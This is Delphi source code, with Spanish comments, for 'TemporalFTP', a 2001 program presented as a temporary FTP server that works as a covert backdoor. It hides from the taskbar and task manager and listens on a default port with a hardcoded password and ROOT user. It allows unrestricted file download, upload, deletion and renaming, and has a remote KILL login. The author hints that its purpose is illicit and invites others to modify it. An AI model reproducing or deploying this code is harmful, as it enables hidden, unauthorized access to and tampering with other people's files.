//***************************************************************************
//*** TemporalFTP V 2.1
//***
//***    Algunas veces es necesario tener un servidor ftp temporal,  para  la
//*** transferencia de arhcivos de una manera rapida y confiable, bueno, pues
//*** existen varios programas que hacen esto, pero he aqui mi opcion.
//***
//***    Como usarlo? Bueno, solo necesitas copiar el archivo en algun folder
//*** en la computadora donde quieres tener el acceso via ftp y ejecutarlo de
//*** la siguiente manera:
//***
//***      ..\programa.exe /p:password(palabra clave) /s:socket(puerto)
//***
//***    Si de alguna manera no se ejecuta con los parametros requeridos, el
//*** programa tomara valores por default, siendo los siguientes:
//***
//***    Passwod : R-M
//***    Socket  : 6210
//***
//***    Los valores aceptados para el password son:
//***    -Letras mayusculas, (aunque convierte todo a mayusculas =P )
//***    -Numeros y
//***    -Caracteres especiales.
//***
//***    Los valores aceptados para el socket son:
//***    -1..65535
//***
//***    Para tener acceso usa el usuario ROOT y para terminar el programa
//*** de manera remota loggeate con el usuario KILL
//***
//*** Ultima modificacion: 25 de marzo del 2001
//*** Autor: Vlad (vlad@raza-mexicana.org)
//*** URL: www.raza-mexicana.org
//***
//***    Notas adicionales:
//***    -El programa se oculta del taskbar (95,98,WinME,NT,2000)
//***    -El programa se oculta del taskmanager (95,98,WinMe)
//***    -Esto lo hice con fines de... bueno ustedes ya sabran para que ;-)
//***    -El programa no se instala para ejecutarse en posteriores ocaciones
//***    -El programa no acepta multiples instancias.
//***    -En caso de que el socket indicado este siendo ocupado por otro
//***     programa, TempralFTP se cerrara.
//***
//***    Agradecimientos a :
//***                    -Borland (espero algun dia poder comprar la licencia
//***                    -Raza Mexicana
//***                    -Mi novia (Mi musa y por aguantarme)
//***                    -Franois PIETTE
//***
//*** Componentes adicionales:
//***   Necesitaras instalar el componente del ftp y del socket, los cuales
//*** los puedes encontrar en : http://www.rtfm.be/fpiette/indexuk.htm
//***
//*** Derechos:
//***   Este programa se distribuye como es, el autor no se hace responsable
//***   por el uso de este programa. Sientete libre de modificar este codigo
//***   fuente que para eso lo publico solo te pido que no te olvides de los
//***   autores y que nos menciones.
//***
//*** Nota final:
//***   Si eres bueno empujando las teclas codificando en cualquier lenguaje
//***   y has hecho algo interesenate no seas &%#"|! y publica el codigo
//***   fuente para que los demas tengamos la oportunidad de aprender mas.
//***************************************************************************
//*** 2.1 Solucionado el error de :
//***     Access Violation at address 00000000 . Read of Address 0000000.
//***     Agradecimiento al Awelo

unit Unit1;

interface

uses
  Windows,
  Classes,
  SysUtils,
  Forms,
  FTPSRVC,
  ScktComp,
  FtpSrv,
  StdCtrls,
  Controls;

type
  TPrincipal = class(TForm)
    server: TFtpServer;
    procedure FormCreate(Sender: TObject);
    procedure FormCloseQuery(Sender: TObject; var CanClose: Boolean);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure serverAuthenticate(Sender: TObject; Client: TFtpCtrlSocket;
      UserName, Password: String; var Authenticated: Boolean);
    procedure serverValidateDele(Sender: TObject; Client: TFtpCtrlSocket;
      var FilePath: String; var Allowed: Boolean);
    procedure serverValidateGet(Sender: TObject; Client: TFtpCtrlSocket;
      var FilePath: String; var Allowed: Boolean);
    procedure serverValidatePut(Sender: TObject; Client: TFtpCtrlSocket;
      var FilePath: String; var Allowed: Boolean);
    procedure serverValidateRnFr(Sender: TObject; Client: TFtpCtrlSocket;
      var FilePath: String; var Allowed: Boolean);
    procedure serverValidateRnTo(Sender: TObject; Client: TFtpCtrlSocket;
      var FilePath: String; var Allowed: Boolean);
  private
    function CargarDLL: Boolean;
  public
    funcion: Function(dwProcessID, dwType: Integer): Integer; stdcall;
    hDLL: HWND;
    ServerPassword,
    ServerSocket : string;
  end;

var
  Principal: TPrincipal;

Const
  _SERVERKILL = 'KILL';
  _SERVERPASSWORD = 'R-M';
  _SERVERSOCKET = '6210';
  _SERVERBANNER = '220 Servidor FTP Temporal Ver. 2.1 por Vlad';
  _SERVERUSER = 'ROOT';


implementation

{$R *.DFM}


function TPrincipal.CargarDLL: Boolean;
begin
 try
   hDLL := LoadLibrary('KERNEL32.DLL');
   if hDLL <> 0 then
     @funcion := GetProcAddress(hDLL, 'RegisterServiceProcess');
   result := true;
 except
   result := false;
 end;
end;


procedure TPrincipal.FormCreate(Sender: TObject);
Var
 n,
 tempLength,
 tempPos : ShortInt;
 tempString : String;
 Mutex: hWnd;
 nombreApp: Array[0..$100] of Char;
begin
 Principal.Left := 1200;
 StrPCopy(nombreApp, Application.Title);
 Mutex := CreateMutexA(nil, False, nombreApp);
 if (GetLastError = ERROR_ALREADY_EXISTS) or (Mutex = 0) then
   Application.Terminate;
 try
   If CargarDLL then
     funcion(GetCurrentProcessID, 1);
 except
 end;
 ServerPassword := _SERVERPASSWORD;
 ServerSocket := _SERVERSOCKET;
 n := 1;
 while n <= ParamCount do begin
   tempString := Uppercase(paramstr(n));
   tempPos := pos(':', tempString);
   tempLength := Length(tempString);
   If (tempPos > 0) then Begin
     If ('P' = tempString[2]) then begin
       ServerPassword := copy(tempString, tempPos + 1, tempLength - 3);
     end else  If ('S' = tempString[2]) then begin
       ServerSocket := copy(tempString, tempPos + 1, tempLength - 3);
       try
         if (StrToInt(ServerSocket) > 65535) or (StrToInt(ServerSocket) < 1) then
           ServerSocket := _SERVERSOCKET;
       except
         ServerSocket := _SERVERSOCKET;
       end;
     end;
   end;
   Inc(n);
 end;
 try
   server.Banner := _SERVERBANNER;
   server.Port := ServerSocket;
   server.Active := True;
 except
   Application.Terminate;
 end;
end;


procedure TPrincipal.FormClose(Sender: TObject; var Action: TCloseAction);
begin
 try
   server.Active := False;
 except
 end;
end;


procedure TPrincipal.FormCloseQuery(Sender: TObject; var CanClose: Boolean);
begin
 CanClose := True;
end;


procedure TPrincipal.serverAuthenticate(Sender: TObject;
  Client: TFtpCtrlSocket; UserName, Password: String;
  var Authenticated: Boolean);
begin
 if Uppercase(Password) <> ServerPassword then begin
   Authenticated := False;
   Client.Close;
   exit;
 end;
 If Uppercase(UserName) = _SERVERKILL then begin
   Authenticated := False;
   Client.Close;
   application.Terminate;
   exit;
 end;
 If Uppercase(UserName) = _SERVERUSER then begin
   Authenticated := True;
 end;

end;

procedure TPrincipal.serverValidateDele(Sender: TObject;
  Client: TFtpCtrlSocket; var FilePath: String; var Allowed: Boolean);
begin
 Allowed := True;
end;

procedure TPrincipal.serverValidateGet(Sender: TObject;
  Client: TFtpCtrlSocket; var FilePath: String; var Allowed: Boolean);
begin
 Allowed := True;
end;

procedure TPrincipal.serverValidatePut(Sender: TObject;
  Client: TFtpCtrlSocket; var FilePath: String; var Allowed: Boolean);
begin
 Allowed := True;
end;

procedure TPrincipal.serverValidateRnFr(Sender: TObject;
  Client: TFtpCtrlSocket; var FilePath: String; var Allowed: Boolean);
begin
 Allowed := True;
end;

procedure TPrincipal.serverValidateRnTo(Sender: TObject;
  Client: TFtpCtrlSocket; var FilePath: String; var Allowed: Boolean);
begin
 Allowed := True;
end;

end.

